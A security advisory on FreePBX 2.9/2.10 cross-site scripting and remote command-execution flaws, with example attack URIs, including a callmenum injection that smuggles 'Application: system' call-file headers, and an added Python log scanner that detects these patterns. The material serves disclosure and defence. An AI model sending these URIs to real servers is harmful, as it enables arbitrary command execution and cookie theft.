FreePBX Multiple Cross Site Scripting and Remote Command Execution Vulnerabilities
BID: 52630
Info
| Bugtraq ID: | 52630 |
| Class: | Input Validation Error |
| CVE: | CVE-2012-4869, CVE-2012-4870 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 20 2012 12:00AM |
| Updated: | Sep 06 2012 10:30PM |
| Credit: | Martin Tschirsich |
| Vulnerable: | freePBX freePBX 2.10, freePBX freePBX 2.9 |
| Not Vulnerable: | |
Discussion
FreePBX is prone to multiple cross-site scripting vulnerabilities and a remote command-execution vulnerability because it fails to properly sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials or execute arbitrary commands within the context of the affected application.
FreePBX 2.9.0 and 2.10.0 are vulnerable; other versions may also be affected.
Exploit / POC
Attackers can exploit the cross-site scripting issues by enticing an unsuspecting victim to follow a malicious URI.
The following example input and URIs are available:
Cross-site scripting:
http://www.example.com//panel/index_amp.php?context=[XSS]
http://www.example.com//panel/flash/mypage.php?clid=[XSS]
http://www.example.com//panel/flash/mypage.php?clidname=[base64_encode(XSS)]
http://www.example.com//panel/dhtml/index.php?context=/../%00">[XSS]
http://www.example.com//admin/views/freepbx_reload.php/"</script>[XSS]
http://www.example.com//recordings/index.php?login='>[XSS]
Command Execution:
http://www.example.com//recordings/misc/callme_page.php?action=c&callmenum=[PHONENUMBER] () from-internal/n%0D%0AApplication:%20system%0D%0AData:%20[CMD]%0D%0A%0D%0A
The following example exploits are available:
Command Execution:
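As an added example (not part of the advisory and not FreePBX code), the following Python scans constructed Apache-style access-log lines for requests that match the patterns listed above: CR/LF-separated call-file headers injected through the callmenum parameter of callme_page.php, and script markup, plain or base64-encoded as for clidname, in the reflected query parameters. The log lines, client addresses and finding labels are constructed; the path-based freepbx_reload.php case is not covered.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit
# Constructed Apache-style access-log lines (sample data, not from the advisory): line 2 carries
# CR/LF-separated call-file headers in callmenum, line 3 a base64-encoded script tag in clidname.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Mar/2012:10:01:02 +0000] "GET /recordings/index.php?login=admin HTTP/1.1" 200 512',
    '10.0.0.9 - - [20/Mar/2012:10:01:07 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=1000%20()%20from-internal/n%0D%0AApplication:%20system%0D%0AData:%20CMD_PLACEHOLDER%0D%0A%0D%0A HTTP/1.1" 200 88',
    '10.0.0.9 - - [20/Mar/2012:10:01:09 +0000] "GET /panel/flash/mypage.php?clidname=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== HTTP/1.1" 200 301',
    '10.0.0.7 - - [20/Mar/2012:10:01:11 +0000] "GET /panel/index_amp.php?context=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 410',
    '10.0.0.7 - - [20/Mar/2012:10:01:13 +0000] "GET /panel/index_amp.php?context=default HTTP/1.1" 200 410',
]
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# Endpoints and query parameters the advisory lists as reflected without sanitisation.
XSS_PARAMS = {"/panel/index_amp.php": ("context",), "/panel/dhtml/index.php": ("context",),
              "/panel/flash/mypage.php": ("clid", "clidname"), "/recordings/index.php": ("login",)}
XSS_MARKERS = re.compile(r'[<>"\']|script', re.IGNORECASE)

def _candidate_values(name, values):
    """Yield each (already URL-decoded) value; clidname is additionally tried as base64."""
    for v in values:
        yield v
        if name == "clidname":
            try:
                yield base64.b64decode(v, validate=True).decode("latin-1")
            except (binascii.Error, ValueError):
                pass  # not base64: nothing further to inspect

def classify_request(target):
    """Label one request target, or return None when it matches no listed pattern."""
    parts = urlsplit(target)
    params = parse_qs(parts.query)  # parse_qs percent-decodes the values
    # A CR/LF inside callmenum means extra call-file headers (e.g. Application:) were appended.
    if parts.path.endswith("/recordings/misc/callme_page.php"):
        if any(re.search(r"[\r\n]|Application:", v, re.I) for v in params.get("callmenum", [])):
            return "callfile-injection"
    for endpoint, names in XSS_PARAMS.items():
        if parts.path.endswith(endpoint):
            for name in names:
                if any(XSS_MARKERS.search(v) for v in _candidate_values(name, params.get(name, []))):
                    return "xss-probe"
    return None

def scan_log(lines):
    """Return (client_ip, label, target) for every logged request that gets a label."""
    hits = [(line.split()[0], m.group(1)) for line in lines if (m := REQUEST_RE.search(line))]
    return [(ip, classify_request(t), t) for ip, t in hits if classify_request(t)]
```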
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
References:
- FreePBX Homepage (FreePBX)
- FreePBX remote command execution, xss (Martin Tschirsich)